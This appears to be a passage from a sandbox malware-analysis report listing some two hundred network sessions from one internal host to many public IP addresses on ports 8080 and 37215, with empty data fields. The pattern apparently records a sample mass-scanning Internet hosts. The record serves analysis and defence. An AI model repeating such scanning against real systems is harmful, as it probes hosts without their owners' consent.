                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27277192.168.2.233461888.64.88.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27278192.168.2.2352560205.56.131.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27279192.168.2.2350272198.90.111.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27280192.168.2.235362834.1.238.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27281192.168.2.234741432.189.215.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27282192.168.2.2343300144.87.234.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27283192.168.2.233872678.167.96.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27284192.168.2.2360460141.130.202.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27285192.168.2.23461909.63.229.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27286192.168.2.2353654177.174.243.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27287192.168.2.2359208219.221.84.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27288192.168.2.2351918187.140.128.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27289192.168.2.2359778183.25.102.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27290192.168.2.2356464140.187.129.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27291192.168.2.2342776155.72.121.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27292192.168.2.2335040146.236.205.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27293192.168.2.2355518204.188.67.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27294192.168.2.235914294.66.158.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27295192.168.2.2341010198.104.79.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27296192.168.2.2345494116.199.237.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27297192.168.2.2347888171.67.253.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27298192.168.2.234764665.53.163.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27299192.168.2.235654898.6.200.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27300192.168.2.2359472192.12.120.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27301192.168.2.2352180108.109.144.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27302192.168.2.2336308138.123.4.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27303192.168.2.235368078.208.231.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27304192.168.2.2356534191.254.60.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27305192.168.2.2338338202.104.179.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27306192.168.2.2352418169.51.77.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27307192.168.2.2347994172.33.177.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27308192.168.2.2338246162.122.229.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27309192.168.2.2341736190.144.56.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27310192.168.2.235372045.210.221.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27311192.168.2.234527857.190.242.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27312192.168.2.2347294108.12.166.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27313192.168.2.235953061.96.220.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27314192.168.2.2348262138.92.34.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27315192.168.2.2342420198.113.212.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27316192.168.2.2348356211.226.205.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27317192.168.2.2358184221.143.201.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27318192.168.2.2337592154.8.210.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27319192.168.2.2337240158.226.246.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27320192.168.2.2353230170.187.18.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27321192.168.2.2341642153.114.215.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27322192.168.2.233399872.124.23.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27323192.168.2.2358822177.185.134.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27324192.168.2.2360508218.215.159.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27325192.168.2.234335295.133.42.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27326192.168.2.234909879.243.245.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27327192.168.2.2350886135.158.177.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27328192.168.2.2348612187.68.118.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27329192.168.2.235673012.179.29.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27330192.168.2.2340818192.137.82.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27331192.168.2.234245224.216.252.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27332192.168.2.2356924124.247.174.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27333192.168.2.2359612117.69.112.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27334192.168.2.2332866179.129.71.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27335192.168.2.2352778112.219.167.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27336192.168.2.2340810221.8.177.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27337192.168.2.2348344217.135.192.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27338192.168.2.2354776125.204.111.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27339192.168.2.234676225.253.223.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27340192.168.2.2355562193.114.171.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27341192.168.2.2333590112.241.146.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27342192.168.2.23387369.195.201.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27343192.168.2.2353640202.56.182.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27344192.168.2.2339772200.208.186.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27345192.168.2.2358028218.44.191.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27346192.168.2.233755269.122.82.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27347192.168.2.2341190218.76.0.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27348192.168.2.2347658155.220.148.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27349192.168.2.2355144154.113.98.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27350192.168.2.233867448.163.89.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27351192.168.2.2347542192.30.152.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27352192.168.2.236070262.158.155.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27353192.168.2.234064083.214.38.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27354192.168.2.234382437.206.245.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27355192.168.2.2350388109.66.5.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27356192.168.2.2350710111.137.161.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27357192.168.2.234050078.166.115.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27358192.168.2.2351458106.120.19.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27359192.168.2.235406850.11.86.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27360192.168.2.2338954153.122.91.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27361192.168.2.2358954211.218.164.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27362192.168.2.2341926154.255.108.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27363192.168.2.233611843.6.56.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27364192.168.2.235039850.96.111.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27365192.168.2.233557813.7.117.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27366192.168.2.233677434.132.250.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27367192.168.2.233347834.126.104.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27368192.168.2.2340734209.5.184.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27369192.168.2.2349288184.171.75.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27370192.168.2.236066069.2.137.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27371192.168.2.233808250.0.92.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27372192.168.2.2338544153.157.86.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27373192.168.2.2355566170.238.15.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27374192.168.2.233782612.124.56.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27375192.168.2.236081860.19.237.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27376192.168.2.2334386221.147.7.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27377192.168.2.2346418154.21.84.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27378192.168.2.235271054.243.88.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27379192.168.2.2337828157.237.17.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27380192.168.2.2356742141.135.153.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27381192.168.2.234948447.1.102.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27382192.168.2.233416859.60.84.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27383192.168.2.234173070.219.159.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27384192.168.2.234908642.49.220.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27385192.168.2.235814820.63.179.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27386192.168.2.2354426118.51.10.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27387192.168.2.235135649.196.135.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27388192.168.2.234273857.208.165.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27389192.168.2.2358534217.136.102.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27390192.168.2.234384849.144.13.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27391192.168.2.2359610156.6.41.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27392192.168.2.2354792132.14.237.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27393192.168.2.2346234120.154.178.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27394192.168.2.2350500113.223.235.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27395192.168.2.235920424.120.241.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27396192.168.2.235960691.124.95.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27397192.168.2.234080467.129.135.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27398192.168.2.2352972199.123.63.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27399192.168.2.2346500174.106.105.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27400192.168.2.235839889.228.74.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27401192.168.2.2338938197.47.200.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27402192.168.2.233286259.139.22.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27403192.168.2.2360816197.116.37.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27404192.168.2.233803841.222.95.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27405192.168.2.2357268197.64.123.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27406192.168.2.2344256157.39.220.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27407192.168.2.2342932197.79.9.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27408192.168.2.2342342197.143.119.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27409192.168.2.2338158197.189.35.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27410192.168.2.2342928197.213.91.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27411192.168.2.2342866197.53.211.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27412192.168.2.2348034157.136.250.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27413192.168.2.2359176197.216.66.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27414192.168.2.2356114173.234.107.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27415192.168.2.235920041.137.151.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27416192.168.2.2345392191.249.133.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27417192.168.2.2356904126.12.197.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27418192.168.2.234999041.237.193.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27419192.168.2.234841642.80.52.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27420192.168.2.234969041.181.91.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27421192.168.2.235078054.77.253.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27422192.168.2.233319441.134.123.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27423192.168.2.2345650197.192.27.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27424192.168.2.2358394189.116.232.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27425192.168.2.2353474157.47.143.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27426192.168.2.2341238100.41.227.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27427192.168.2.2333374197.94.116.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27428192.168.2.2356440157.146.231.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27429192.168.2.2338376157.169.85.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27430192.168.2.2333826171.249.134.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27431192.168.2.2335188157.238.211.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27432192.168.2.235530490.213.228.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27433192.168.2.2353826111.158.160.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27434192.168.2.2336988164.188.178.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27435192.168.2.2340046197.255.36.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27436192.168.2.2337938197.88.52.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27437192.168.2.2338282157.255.131.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27438192.168.2.2353682157.81.84.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27439192.168.2.2342328157.23.113.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27440192.168.2.2349154157.153.140.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27441192.168.2.235446869.139.134.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27442192.168.2.2338880186.92.86.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27443192.168.2.2358850157.203.94.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27444192.168.2.2348642201.251.128.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27445192.168.2.2334430197.235.66.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27446192.168.2.2359474197.150.218.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27447192.168.2.2358774107.37.255.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27448192.168.2.2344020157.172.208.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27449192.168.2.234284217.226.199.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27450192.168.2.2353844197.41.188.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27451192.168.2.2332974201.144.65.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27452192.168.2.2360170197.157.234.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27453192.168.2.2354406157.127.34.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27454192.168.2.2335104157.45.128.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27455192.168.2.235203894.245.209.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27456192.168.2.2356502197.80.42.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27457192.168.2.2342316157.186.122.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27458192.168.2.234350641.85.163.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27459192.168.2.235113818.95.18.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27460192.168.2.2356420197.42.171.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27461192.168.2.2357984157.50.159.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27462192.168.2.234239241.124.33.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27463192.168.2.2337648197.216.142.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27464192.168.2.2341190197.226.216.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27465192.168.2.235097441.247.104.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27466192.168.2.235539895.215.141.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27467192.168.2.2334644218.234.197.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27468192.168.2.23592989.76.150.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27469192.168.2.2337152157.189.184.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27470192.168.2.2335670197.128.26.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27471192.168.2.2340170216.183.151.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27472192.168.2.234679067.131.97.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27473192.168.2.2359342197.132.120.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27474192.168.2.2340266197.83.117.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27475192.168.2.2353636157.176.214.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27476192.168.2.2350766157.138.237.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27477192.168.2.2345672197.49.62.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27478192.168.2.233610041.43.178.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27479192.168.2.2337256197.117.82.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27480192.168.2.2342586157.237.112.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27481192.168.2.235053641.104.236.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27482192.168.2.235187041.119.225.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27483192.168.2.2341700197.168.70.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27484192.168.2.235041641.172.106.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27485192.168.2.2343056171.163.218.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27486192.168.2.2341040189.163.106.18937215
                                                        TimestampBytes transferredDirectionData


